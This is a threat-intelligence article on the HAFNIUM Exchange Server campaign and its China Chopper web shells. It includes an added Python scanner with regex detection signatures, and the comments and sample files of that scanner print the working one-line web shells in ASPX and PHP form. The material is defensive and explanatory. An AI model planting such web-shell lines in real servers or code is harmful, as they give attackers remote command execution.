On March 2, 2021, Microsoft released out-of-band patches for on-premises Microsoft Exchange Servers and described targeted exploitation by the likely China-based HAFNIUM threat group to steal data. Related reporting indicates that the campaign has been ongoing since at least January 2021. Organizations with vulnerable systems should apply these updates as soon as possible.
Secureworks® Counter Threat Unit™ (CTU) researchers observed elements of this campaign across our customer base. On March 1, our endpoint telemetry identified China Chopper web shells on Exchange Servers at approximately a dozen clients. We had detected similar activity affecting a smaller number of customers in February. China Chopper is a widely available web shell that has been used since at least 2013 and is relatively easily detected by endpoint controls.
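The "relatively easily detected" point above is worth making concrete. China Chopper's server-side component is a one-line script that passes a request parameter to `eval`, which is why a simple content signature catches it. The following scanner is an added example written for this page, not Secureworks code or tooling; it walks a directory tree, looks only at small web-script files, and flags the eval-of-request-parameter idiom. The directory layout, file names and file contents in `build_sample_tree()` are constructed for the demonstration and are not real Exchange files or names from the campaign.

```python
import os
import re
import tempfile

# Signatures for the one-line China Chopper web shell. The ASPX form is
#   <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
# and the PHP form is
#   <?php @eval($_POST['pass']);?>
# Matching on the eval-of-request-parameter idiom rather than a fixed string
# tolerates whitespace and parameter-name changes between samples.
CHOPPER_SIGNATURES = [
    re.compile(rb'eval\s*\(\s*Request(?:\.Item)?\s*[\[(]', re.IGNORECASE),
    re.compile(rb'@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[', re.IGNORECASE),
]
WEB_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp", ".php"}
MAX_SHELL_SIZE = 8192  # the one-liner is well under 1 KiB; large pages are skipped


def scan_file(path):
    """Return the matched signature text if `path` looks like China Chopper, else None."""
    if os.path.splitext(path)[1].lower() not in WEB_EXTENSIONS:
        return None
    try:
        if os.path.getsize(path) > MAX_SHELL_SIZE:
            return None
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        return None
    for sig in CHOPPER_SIGNATURES:
        m = sig.search(data)
        if m:
            return m.group(0).decode("latin-1")
    return None


def scan_tree(root):
    """Walk `root` and return a sorted list of (path, matched_text) for every hit."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            match = scan_file(path)
            if match:
                hits.append((path, match))
    return sorted(hits)


def build_sample_tree():
    """Constructed sample web root (hypothetical names and contents, not real Exchange files)."""
    root = tempfile.mkdtemp(prefix="webroot_sample_")
    files = {
        # benign page: no eval-of-request idiom
        "owa/auth/page1.aspx": b'<%@ Page Language="C#" %>\r\n<html><body>Hello</body></html>\r\n',
        # classic JScript one-liner
        "owa/auth/web.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
        # whitespace/paren variant of the same idiom
        "aspnet_client/system_web/shell.aspx": b'<% eval( Request ( "pw" ) , "unsafe" ) %>',
        # benign but large page: exercises the size cut-off
        "owa/auth/page2.aspx": b'<%@ Page Language="C#" %>\r\n' + b'<div>content</div>\r\n' * 600,
        # right content, wrong extension: must be ignored
        "notes.txt": b'eval(Request.Item["x"])',
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, match in scan_tree(build_sample_tree()):
        print(f"{path}: {match}")
```

On a real Exchange host the tree to scan is the IIS web root and the Exchange client-access virtual directories; a signature this narrow is a triage aid, not a substitute for endpoint telemetry, since an attacker who changes the one-liner (a different parameter sink, or an obfuscated `eval`) will not match it.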
This combination of exploitation technique and use of China Chopper made this activity particularly puzzling. Exploits for vulnerabilities that have no patch available (‘zero-days’) are rare. Most government-sponsored actors avoid using zero-days because they don’t need to. Zero-days affecting Exchange are even rarer and are incredibly valuable, because unauthenticated remote code execution on mail servers is a very bad thing. It was therefore surprising that the threat actors ‘burned’ valuable exploits by executing malware that many security vendors would quickly detect.
So why do it?
It is always risky to make assumptions or attempt to rationalize the actions of threat actors who are operating in an unknown operational a ..